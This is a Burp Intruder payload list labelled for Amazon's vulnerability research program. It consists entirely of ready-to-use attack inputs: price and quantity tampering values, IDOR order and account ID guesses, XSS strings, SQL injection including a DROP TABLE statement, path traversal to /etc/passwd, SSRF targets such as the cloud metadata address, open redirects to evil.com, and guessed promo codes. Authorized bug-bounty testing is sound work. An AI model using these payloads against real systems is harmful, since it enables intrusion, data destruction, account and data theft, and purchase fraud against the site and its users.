# Amazon VRP Intruder Payloads
# Use these in Burp Intruder for parameter fuzzing

# ========== PRICE MANIPULATION ==========
0
-1
-100
0.01
0.001
0.00001
99999999
1e10
NaN
Infinity
null
undefined

# ========== QUANTITY MANIPULATION ==========
0
-1
-999
0.5
1.5
99999
2147483647
9999999999999

# ========== IDOR - ORDER IDS ==========
000-0000000-0000000
111-1111111-1111111
999-9999999-9999999
123-4567890-1234567
{{own_order_id}}
{{own_order_id}}1
1{{own_order_id}}

# ========== IDOR - USER IDS ==========
amzn1.account.AAAAAAAAAAAAAAAAAAAAAAAAAAA
amzn1.account.000000000000000000000000000
amzn1.account.ZZZZZZZZZZZZZZZZZZZZZZZZZZZ
{{own_profile_id}}
{{own_profile_id}}1

# ========== XSS PAYLOADS ==========
<script>alert(1)</script>
"><script>alert(1)</script>
'><script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
javascript:alert(1)
{{constructor.constructor('alert(1)')()}}

# ========== SQL INJECTION ==========
'
''
' OR '1'='1
' OR '1'='1'--
" OR "1"="1
'; DROP TABLE users--
1' AND '1'='1
1 AND 1=1
1 AND 1=2

# ========== PATH TRAVERSAL ==========
../
..\/
....//
..%2f
%2e%2e%2f
..%252f
/etc/passwd
C:\Windows\system.ini

# ========== SSRF ==========
http://localhost
http://127.0.0.1
http://169.254.169.254
http://[::1]
http://0.0.0.0
http://127.1
http://2130706433

# ========== OPEN REDIRECT ==========
//evil.com
///evil.com
/\evil.com
//evil.com/%2f..
https://evil.com
javascript:alert(1)

# ========== COUPON/PROMO CODES ==========
TEST
EXPIRED
ADMIN
INTERNAL
DEBUG
DISCOUNT100
FREE
100OFF
PROMO
